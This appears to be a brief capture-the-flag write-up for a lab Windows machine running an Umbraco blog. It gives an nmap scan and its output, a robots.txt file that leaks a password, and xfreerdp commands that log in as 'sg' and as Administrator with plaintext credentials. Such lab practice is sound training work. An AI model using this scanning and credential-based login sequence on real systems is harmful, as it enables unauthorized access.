IP: 10.10.179.75

-----------

1. nmap scan:   nmap -sC -sV 10.10.179.75

'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Host is up (0.40s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-robots.txt: 4 disallowed entries 
|_/bin/ /config/ /umbraco/ /umbraco_client/
|_http-title: Anthem.com - Welcome to our blog
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: WIN-LU09299160F
|   NetBIOS_Domain_Name: WIN-LU09299160F
|   NetBIOS_Computer_Name: WIN-LU09299160F
|   DNS_Domain_Name: WIN-LU09299160F
|   DNS_Computer_Name: WIN-LU09299160F
|   Product_Version: 10.0.17763
|_  System_Time: 2021-02-18T14:09:24+00:00
| ssl-cert: Subject: commonName=WIN-LU09299160F
| Not valid before: 2021-01-02T15:57:43
|_Not valid after:  2021-07-04T15:57:43
|_ssl-date: 2021-02-18T14:09:32+00:00; -11h59m59s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -11h59m59s, deviation: 0s, median: -11h59m59s
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

2. robots.txt (hint)

''''''''''''''''''''''''''''''''''''''''''
UmbracoIsTheBest!

# Use for all search robots
User-agent: *

# Define the directories not to crawl
Disallow: /bin/
Disallow: /config/
Disallow: /umbraco/
Disallow: /umbraco_client/
''''''''''''''''''''''''''''''''''''''''''

3. Remote Desktop:
- user sg: xfreerdp /u:sg /p:UmbracoIsTheBest! /v:10.10.179.75
- user Administrator: xfreerdp /u:Administrator /p:ChangeMeBaby1MoreTime /v:10.10.179.75

